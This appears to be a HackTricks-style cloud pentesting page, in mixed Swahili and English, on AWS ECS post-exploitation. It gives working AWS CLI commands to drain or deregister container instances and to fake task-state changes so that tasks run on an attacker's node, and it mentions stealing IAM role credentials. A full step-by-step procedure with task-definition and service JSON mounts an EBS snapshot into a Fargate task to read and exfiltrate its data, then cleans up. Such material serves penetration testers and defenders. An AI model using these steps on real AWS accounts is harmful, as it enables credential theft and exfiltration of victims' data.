AWS - ECS Post Exploitation

Reading time: 6 minutes

ECS

Kwa taarifa zaidi angalia:

AWS - ECS Enum

Host IAM Roles

Katika ECS, IAM role can be assigned to the task inayokimbia ndani ya container. If task inakimbia ndani ya EC2 instance, EC2 instance itakuwa na another IAM role attached to it.
Hii inamaanisha kwamba ikiwa utafanikiwa compromise ECS instance unaweza kwa uwezekano obtain the IAM role associated to the ECR and to the EC2 instance. Kwa habari zaidi kuhusu jinsi ya kupata those credentials angalia:

Cloud SSRF - HackTricks

Privesc to node to steal other containers creds & secrets

Zaidi ya hayo, EC2 inatumia docker kuendesha ECS tasks, hivyo kama utaweza kutoroka hadi node au access the docker socket, unaweza check ni other containers zipi zinaendeshwa, na hata get inside of them na steal their IAM roles attached.

Making containers run in current host

Zaidi ya hayo, EC2 instance role kawaida huwa na vya kutosha permissions za update the container instance state za EC2 instances zinazotumika kama nodes ndani ya cluster. Mshambuliaji anaweza kubadilisha state of an instance to DRAINING, kisha ECS ita remove all the tasks from it na zile zinazoendeshwa kama REPLICA zita run in a different instance, huenda ndani ya attackers instance, hivyo anaweza steal their IAM roles na taarifa nyeti zinazoweza kuwepo ndani ya container.

aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>

Mbinu ile ile inaweza kufanywa kwa deregistering the EC2 instance from the cluster. Inaweza kuwa si ya siri zaidi lakini italazimisha majukumu yatekelezwe kwenye instances nyingine:

aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force

Mbinu ya mwisho ya kulazimisha utekelezaji upya wa tasks ni kwa kumfahamisha ECS kwamba task or container was stopped. Kuna 3 APIs zinazowezekana za kufanya hili:

# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]

# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...

# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...

Kuiba taarifa nyeti kutoka kwa ECR containers

The EC2 instance huenda pia ina ruhusa ecr:GetAuthorizationToken inayoruhusu kupakua images (unaweza kutafuta taarifa nyeti ndani yao).

Unganisha snapshot ya EBS moja kwa moja ndani ya ECS task (configuredAtLaunch + volumeConfigurations)

Tumia vibaya muunganisho wa asili wa ECS EBS (2024+) kuunganisha yaliyomo ya snapshot ya EBS iliyopo moja kwa moja ndani ya ECS task/service mpya na kusoma data yake kutoka ndani ya container.

• Inahitajika (chini kabisa):

• ecs:RegisterTaskDefinition

• Mojawapo ya: ecs:RunTask OR ecs:CreateService/ecs:UpdateService

• iam:PassRole kwenye:

• ECS infrastructure role inayotumika kwa volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)

• Task execution/Task roles zinazorejelewa na task definition

• Ikiwa snapshot imefumwa kwa CMK: ruhusa za KMS kwa infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).

• Athari: Soma yaliyomo yoyote ya diski kutoka snapshot (kwa mfano, faili za database) ndani ya container na kusafirisha nje kupitia mtandao/maandishi ya kumbukumbu (network/logs).

Steps (Fargate example):

1. Unda ECS infrastructure role (ikiwa haipo) na uambatisha managed policy:

aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes

2. Sajili task definition na volume iliyoelezwa configuredAtLaunch na ui-mount katika container. Mfano (prints the secret then sleeps):

{
"family": "ht-ebs-read",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
"containerDefinitions": [
{"name":"reader","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["cat /loot/secret.txt || true; sleep 3600"],
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/ebs","awslogs-stream-prefix":"reader"}},
"mountPoints":[{"sourceVolume":"loot","containerPath":"/loot","readOnly":true}]
}
],
"volumes": [ {"name":"loot", "configuredAtLaunch": true} ]
}

3. Unda au sasisha service kwa kupitisha EBS snapshot kupitia volumeConfigurations.managedEBSVolume (inahitaji iam:PassRole kwenye infra role). Mfano:

{
"cluster": "ht-ecs-ebs",
"serviceName": "ht-ebs-svc",
"taskDefinition": "ht-ebs-read",
"desiredCount": 1,
"launchType": "FARGATE",
"networkConfiguration": {"awsvpcConfiguration":{"assignPublicIp":"ENABLED","subnets":["subnet-xxxxxxxx"],"securityGroups":["sg-xxxxxxxx"]}},
"volumeConfigurations": [
{"name":"loot","managedEBSVolume": {"roleArn":"arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole", "snapshotId":"snap-xxxxxxxx", "filesystemType":"ext4"}}
]
}

4. Wakati task inapoanza, container inaweza kusoma yaliyomo ya snapshot kwenye mount path iliyosanifiwa (kwa mfano, /loot). Exfiltrate kupitia network/logs za task.

Usafishaji:

aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read